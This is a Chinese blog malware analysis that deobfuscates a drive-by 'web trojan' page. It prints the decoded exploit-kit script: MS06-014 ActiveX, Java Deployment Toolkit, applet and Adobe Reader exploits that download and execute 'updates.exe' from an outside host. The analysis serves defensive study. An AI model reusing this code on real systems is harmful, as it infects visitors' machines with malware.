          cDQWOo8100q=hSue6YJ53.join("");var fnrQ1XD35b=0;var ye05Y7kuG = navigator.userAgent.toLowerCase();isIE = (ye05Y7kuG.indexOf('msie') != -1 && ye05Y7kuG.indexOf('opera') == -1);isOpera = (ye05Y7kuG.indexOf('opera') != -1);isGecko = (ye05Y7kuG.indexOf('gecko') != -1 && ye05Y7kuG.indexOf('safari') == -1);isSafari = (ye05Y7kuG.indexOf('safari') != -1 && ye05Y7kuG.indexOf('chrome') == -1);isKonqueror = (ye05Y7kuG.indexOf('konqueror') != -1);isChrome = (ye05Y7kuG.indexOf('chrome') != -1);if(isIE!=false){if ((ZBCvB8K9yt2i=navigator.systemLanguage)&&(SZ20hZHZBdX=navigator.userLanguage)&&(z0O4C=navigator.browserLanguage)&& !(LS3vs728=navigator.language)){fnrQ1XD35b=517;}}if(isOpera!=false){if (!(ZBCvB8K9yt2i=navigator.systemLanguage)&&(SZ20hZHZBdX=navigator.userLanguage)&&(z0O4C=navigator.browserLanguage)&&(LS3vs728=navigator.language)){fnrQ1XD35b=517;}}if(isGecko!=false){if (!(ZBCvB8K9yt2i=navigator.systemLanguage)&&!(SZ20hZHZBdX=navigator.userLanguage)&&!(z0O4C=navigator.browserLanguage)&&(LS3vs728=navigator.language)){fnrQ1XD35b=517;}}if(isSafari!=false){if (!(ZBCvB8K9yt2i=navigator.systemLanguage)&&!(SZ20hZHZBdX=navigator.userLanguage)&&!(z0O4C=navigator.browserLanguage)&&(LS3vs728=navigator.language)){fnrQ1XD35b=517;}}if(isChrome!=false){if (!(ZBCvB8K9yt2i=navigator.systemLanguage)&&!(SZ20hZHZBdX=navigator.userLanguage)&&!(z0O4C=navigator.browserLanguage)&&(LS3vs728=navigator.language)){fnrQ1XD35b=517;}};
          
           // Default: filler token that does not occur in "evl28iqtnal", receiver String.
           var T22801="i2Ry25";
           var h2pFY0=String;
           // Check passed: the filler becomes "l28iqtn" and the receiver becomes `this`.
           if (fnrQ1XD35b==517){T22801="l28iqtn"; h2pFY0=this;};
           // With the flag set this yields "eval"; otherwise the string is unchanged and
           // names no method on String, so the call below fails instead of evaluating.
           SB14RxYzkDTr="evl28iqtnal".replace(T22801,"");
           // Evaluates the un-shuffled layer. For analysis, print cDQWOo8100q instead.
           h2pFY0[SB14RxYzkDTr](cDQWOo8100q);
       </script>


同样,继续从尾巴开始看起,查找突破口

程序代码 程序代码
// Tail of the second layer: builds the evaluator name at run time.
// Default filler "i2Ry25" does not occur in "evl28iqtnal"; default receiver is String.
var T22801="i2Ry25";
           var h2pFY0=String;
           // Only when the earlier browser check set fnrQ1XD35b to 517 do the filler
           // and the receiver switch to values that produce this["eval"].
           if (fnrQ1XD35b==517){T22801="l28iqtn"; h2pFY0=this;};
           // "evl28iqtnal" minus "l28iqtn" is "eval"; with the default filler the string
           // stays unchanged and names no method on String.
           SB14RxYzkDTr="evl28iqtnal".replace(T22801,"");
           // Evaluates the decoded string; replace with a text dump when analysing.
           h2pFY0[SB14RxYzkDTr](cDQWOo8100q);

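看一看if后面的代码:当fnrQ1XD35b==517时,T22801="l28iqtn",h2pFY0=this,那么SB14RxYzkDTr="evl28iqtnal".replace(T22801,"");就是从"evl28iqtnal"中去掉"l28iqtn",结果就是eval,最后一句相当于this["eval"](cDQWOo8100q)。
如果条件不成立,T22801保持"i2Ry25",替换不会发生,h2pFY0仍是String,要调用的方法名并不存在,解密出的代码也就不会被执行。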

这样就好办了,跟上面一样的思路,用textarea截取之
在</script>前面添加
t=cDQWOo8100q
txt.value=(t);
保存运行。和上一层一样,只想得到明文时要先去掉末尾的h2pFY0[SB14RxYzkDTr](cDQWOo8100q);这一句,否则在满足fnrQ1XD35b==517的浏览器里,解密结果会被直接执行。



现在,明文已经出来了,2次eval。

我对这个代码好好整理了一下,替换掉连接符,咱们看看
程序代码 程序代码
<!-- Malzilla Project v.1 --><!-- DAT: 2010-5-14 6:23:53 --><!-- URL: golooglecom.in/rz141_at/index.php?s=208feca1a8b149965fa6d3be651c5953 --><!-- REF: http://fracala.com/bu1/ --><!-- UAS: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) --><!-- CCK:  -->
<html><TEXTAREA id=txt rows=57 cols=108></*TEXTAREA><script type="text/JavaScript">

     var Shy1qHjEP8UX='http://golooglecom.in/rz141_at/load.php?spl=mdac&fh=';
     function HSxq3uCd9eJX(z1McmSTMqbSV,LthNvqt2Utda)     {
            var cBjl0nHGVGGM=null;
            try{cBjl0nHGVGGM=z1McmSTMqbSV.CreateObject(LthNvqt2Utda)
            }catch(e){}if(!cBjl0nHGVGGM){
                try{cBjl0nHGVGGM=z1McmSTMqbSV.CreateObject(LthNvqt2Utda,"")
            }catch(e){}}if(!cBjl0nHGVGGM){
                try{cBjl0nHGVGGM=z1McmSTMqbSV.CreateObject(LthNvqt2Utda,"","")
            }catch(e){}}if(!cBjl0nHGVGGM){
               try{cBjl0nHGVGGM=z1McmSTMqbSV.GetObject("",LthNvqt2Utda)
            }catch(e){}}if(!cBjl0nHGVGGM){
                try{cBjl0nHGVGGM=z1McmSTMqbSV.GetObject(LthNvqt2Utda,"")
            }catch(e){}}if(!cBjl0nHGVGGM){
               try{cBjl0nHGVGGM=z1McmSTMqbSV.GetObject(LthNvqt2Utda)
            }catch(e){}}return(cBjl0nHGVGGM);
    }
    function S1aw85UTWSKZ(wp45E2703Smo)    {
        qFBmrdHqXyES="updates.exe";
        var eWCVBW3Khm7r=wp45E2703Smo.CreateObject("Scripting.FileSystemObject","");
        var sap=HSxq3uCd9eJX(wp45E2703Smo,"Shell.Application");
        var z9TJ28uFxxJC=HSxq3uCd9eJX(wp45E2703Smo,"ADODB.Stream");
        var FO86eORCO20W=null;qFBmrdHqXyES=eWCVBW3Khm7r.BuildPath(eWCVBW3Khm7r.GetSpecialFolder(2),qFBmrdHqXyES);z9TJ28uFxxJC.Mode=3;
        try{
            FO86eORCO20W=HSxq3uCd9eJX(wp45E2703Smo,"Microsoft.XMLHTTP");FO86eORCO20W.open("GET",Shy1qHjEP8UX,false);
        }catch(e){try{
            FO86eORCO20W=HSxq3uCd9eJX(wp45E2703Smo,"MSXML2.XMLHTTP");FO86eORCO20W.open("GET",Shy1qHjEP8UX,false);
                    }catch(e){try{
                            FO86eORCO20W=HSxq3uCd9eJX(wp45E2703Smo,"MSXML2.ServerXMLHTTP");FO86eORCO20W.open("GET",Shy1qHjEP8UX,false);
                        }catch(e){try{
                            FO86eORCO20W=new XMLHttpRequest();FO86eORCO20W.open("GET",Shy1qHjEP8UX,false);
                           }catch(e){
                                  return 0;
                                     }
                           }
                        }
                    }
              z9TJ28uFxxJC.Type=1;
              FO86eORCO20W.send(null);
              rb=FO86eORCO20W.responseBody;z9TJ28uFxxJC.Open();
              z9TJ28uFxxJC.Write(rb);
              z9TJ28uFxxJC.SaveTofile(qFBmrdHqXyES,2);
              sap.ShellExecute(qFBmrdHqXyES);
              return 1;
      }
    function mdac(){
        var iPM2s9qnO2ZF=0;
        var vezc7KCSqOx3d=new Array('BD96C556-65A3-11D0-983A-00C04FC29E36','BD96C556-65A3-11D0-983A-00C04FC29E30','AB9BCEDD-EC7E-47E1-9322-D4A210617116','0006F033-0000-0000-C000-000000000046','0006F03A-0000-0000-C000-000000000046','6e32070a-766d-4ee6-879c-dc1fa91d2fc3','6414512B-B978-451D-A0D8-FCFDF33E833C','7F5B7F63-F06F-4331-8A26-339E03C0AE3D','06723E09-F4C2-43c8-8358-09FCD1DB0766','639F725F-1B2D-4831-A9FD-874847682010','BA018599-1DB3-44f9-83B4-461454C84BF8','D0C07D56-7C69-43F1-B4A0-25F5A11FAB19','E8CCCDDF-CA28-496b-B050-6C07C962476B',null);
        while(vezc7KCSqOx3d[iPM2s9qnO2ZF]){
            var wp45E2703Smo=null;
            wp45E2703Smo=document.createElement("object");
            wp45E2703Smo.setAttribute("classid","clsid:"+vezc7KCSqOx3d[iPM2s9qnO2ZF]);
              if(wp45E2703Smo){
                    try{var or6DpKfeS0xU=HSxq3uCd9eJX(wp45E2703Smo,"Shell.Application");
                 if(Or6DpKfeS0xU){
                      if(S1aw85UTWSKZ(wp45E2703Smo))return 1;}
                  }catch(e){}
              }
              iPM2s9qnO2ZF++;
              }
    }
            
     setTimeout("mdac();",200);
     function java_dt(){
        try{var u = "-J-jar -J\\\\golooglecom.in\\smb\\new.avi http://golooglecom.in/rz141_at/load.php?spl=x1YY&fh=";if (window.navigator.appName == "Microsoft Internet Explorer"){
        try { var o = document.createElement("OBJECT");o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";o.launch(u);
        } catch(e) {var o2 = document.createElement("OBJECT");o2.classid = "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93";o2.launch(u);}
        } else {
            var o = document.createElement("OBJECT");
            var n = document.createElement("OBJECT");o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";n.type = "application/java-deployment-toolkit";document.body.appendChild(o);document.body.appendChild(n);try {o.launch(u);} catch (e) {n.launch(u);}}} catch (e) {}
            }
     setTimeout("java_dt();",1000);
     function java_gsb(){
        var javaelem = document.createElement("applet");
        var paramelem = document.createElement("param");
        paramelem.setAttribute("name", "sc");
        paramelem.setAttribute("value", "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");
        javaelem.setAttribute("code", "AppleT");
        javaelem.setAttribute("archive", "1.jar");
        javaelem.setAttribute("width", "100%");
        javaelem.setAttribute("height", "100%");
        javaelem.appendChild(paramelem);
        document.body.appendChild(javaelem);
    }
        setTimeout("java_gsb();",3000);
     function pdf_ie(){
       try{
       var pdfObject = document.createElement("OBJECT");
       pdfObject.setAttribute("id", "jdf1");
       pdfObject.setAttribute("classid", "clsid:CA8A9780-280D-11CF-A24D-444553540000");
       document.body.appendChild(pdfObject);
       var ver = jdf1.GetVersions();
       ver = ver.split(",");
       ver = ver[1].split("=");
       ver = ver[1];if (((ver >= "7") && (ver < "7.1.4")) || ((ver >= "8") && (ver < "8.1.7")) || ((ver >= "9") && (ver < "9.3"))){
       var pdfelement = document.createElement("iframe");
       pdfelement.setAttribute("src", "http://golooglecom.in/rz141_at/pdf.php?fh=");
       pdfelement.setAttribute("width", 200);
       pdfelement.setAttribute("height", 200);
       document.body.appendChild(pdfelement);}
       }catch(e){}
     }
      setTimeout("pdf_ie();",9000);                
    
       </script>


仔细看看这个代码可以发现,他不是一个单一的网马来的。他至少利用了4个漏洞来下载木马。

首先是mdac函数,它利用的是IE的MS06-014(ms06014)漏洞来进行传播。mdac函数首先从13个问题组件的classid中逐个尝试,下面列举一部分

程序代码 程序代码
RDS.DataSpace    BD96C556-65A3-11D0-983A-00C04FC29E36     ms06014

Business Object Factory    AB9BCEDD-EC7E-47E1-9322-D4A210617116    

Outlook Data Object         0006F033-0000-0000-C000-000000000046


VsaIDE.DTE     E8CCCDDF-CA28-496b-B050-6C07C962476B


Microsoft.DbgClr.DTE.8.0    D0C07D56-7C69-43F1-B4A0-25F5A11FAB19



如果有一个存在,那么就利用其下载目标文件。S1aw85UTWSKZ是主要的执行下载和执行任务的函数。利用Scripting.FileSystemObject来查找路径,在这里可见是存放到temp目录,利用Microsoft.XMLHTTP,MSXML2.XMLHTTP或者MSXML2.ServerXMLHTTP来执行下载的指令,利用ADODB.Stream来打开,另存为下载的文件,最后使用Shell.Application的ShellExecute方法来执行下载的木马。对于ie漏洞利用的基本流程就是这样。

看下一个
java_dt这个函数,这个是利用Java开发工具包URL参数远程代码执行漏洞的一个函数(从代码中的MIME类型application/java-deployment-toolkit可以看出,这里指的是Java Deployment Toolkit,即Java部署工具包)

java_gsb是另外一个利用Java的applet对象的漏洞利用函数,他的这个value值,应当是作者的利用网址。

pdf_ie是利用Adobe Reader/Acrobat AcroPDF.dll ActiveX控件远程代码执行漏洞的函数


好了,这个网马的解密基本就是这样了,他分别利用了IE的ms06014漏洞,Java开发工具包URL参数远程代码执行漏洞和Adobe Reader/Acrobat AcroPDF.dll ActiveX控件远程代码执行漏洞等3个系统漏洞来完成设计目标。

全文完

by  daokers



以下说明属本文之一部分:
转载请保持完整并注明:转自 金刀客[www.daokers.com]


[本日志由 admin 于 2010-10-16 11:32 AM 编辑]